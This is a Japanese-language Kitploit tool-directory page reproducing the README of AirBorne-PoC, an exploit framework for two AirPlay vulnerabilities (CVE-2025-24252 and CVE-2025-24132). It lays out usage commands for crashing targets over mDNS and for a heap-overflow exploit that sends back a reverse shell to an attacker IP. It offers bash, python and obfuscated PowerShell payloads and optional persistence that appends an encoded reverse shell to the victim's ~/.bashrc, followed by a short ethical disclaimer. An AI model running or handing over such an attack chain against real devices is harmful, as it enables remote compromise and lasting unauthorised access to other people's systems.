Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
AirBorne-PoC — CVE-2025-24252 および CVE-2025-24132 の PoC | Kitploit
ツール/GitHubGitHub/ekomssavior/airborne-poc
永続化メカニズム脆弱性分析エクスプロイトシェルコードポストエクスプロイトコマンド&コントロールリモートアクセスツールペイロード開発バイナリエクスプロイト
GitHubekomssavior/airborne-poc

AirBorne-PoC

CVE-2025-24252 および CVE-2025-24132 の PoC

164277ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

AirBorne PoC Framework – エリート RCE エディション

CVE-2025-24252 & CVE-2025-24132 用の完全な PoC フレームワーク
ekomsSavior 作 |

AirBorne は、Apple の AirPlay サービスにおける 2 つの深刻な脆弱性を標的とした、統合型の概念実証 (PoC) フレームワークです。完全なクラッシュトリガーと、オプションの永続化、リスナー、複数のペイロード形式を備えた動作するリバースシェルエクスプロイトが、すべて 1 つのスクリプトに含まれています。

オリジナル版をお探しですか?
レガシー版は、このリポジトリの legacy ブランチで引き続き入手できます。
チェックアウトするには:

root@kitploit:~
git checkout legacy

対象 CVE

CVE-2025-24252 – mDNS TXT レコードクラッシュ

  • 不正な mDNS パケットにより、AirPlayReceiver デーモンでクラッシュを引き起こします
  • ポート 5353 の UDP ブロードキャストで動作します

CVE-2025-24132 – ヒープオーバーフロー → リバースシェル (RCE)

  • ポート 7000 の AirPlay TCP サービスでヒープオーバーフローを引き起こします
  • bash、python、PowerShell のリバースシェルペイロードをサポートします
  • .bashrc インジェクション (Linux) を使用したオプションの永続化を含みます

はじめに

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. 依存関係のインストール

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

実行時の流れ

単一のスクリプト airborne.py に、両方の PoC とすべてのロジックが含まれています:

  • --exploit で CVE を選択
  • --payload でリバースシェルペイロードを設定
  • netcat リスナーを自動起動
  • --persistent でターゲット上の永続化をオプションで有効化

使用例

mDNS パケットでターゲットをクラッシュさせる (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

モニターモードのインターフェースが必要です。


ヒープオーバーフローを発動 → RCE (CVE-2025-24132)

デフォルトの bash シェルで完全なエクスプロイトを開始:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

代わりに Python シェルを選択:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Linux ターゲットで実際の永続化を有効化:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

シェルコマンドインジェクションのみ

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

ペイロードオプション

ペイロード説明
bashTCP 経由のデフォルトの bash リバースシェル
pythonsocket と pty を使用した Python ベースのリバースシェル
powershell完全な Windows PowerShell RCE ペイロード (難読化済み)

永続化モード

--persistent を使用すると、スクリプトはエンコードされたリバースシェルペイロードをターゲットの以下に追記します:

root@kitploit:~
~/.bashrc

これにより、ユーザーがログインするかターミナルが起動されるたびに、シェルが返されます。


メンテナンスノート

  • リバースシェルは base64 でエンコードされ、バッファオーバーフローの後に配信されます
  • すべてのペイロードはポート 7000 経由で送信されます
  • mDNS パケットは UDP 5353 で送信され、raw ソケット権限が必要です
  • 攻撃マシンの IP がターゲットデバイスから到達可能であることを確認してください
  • スクリプトは基本的なエラーケースを処理し、ポートが閉じている場合は静かに失敗します

倫理的免責事項

このプロジェクトは、教育、倫理、および許可された研究のみを目的としています。

  • ターゲットシステムをテストするには、明示的な許可を得る必要があります。
  • 実行されたすべての行為に対して全責任を負います。

システムへの許可のない悪用は違法かつ非倫理的です。


クレジット

  • ekomsSavior によって構築されました
  • 実世界の CVE とエクスプロイト開発研究に着想を得ています
ツールをダウンロード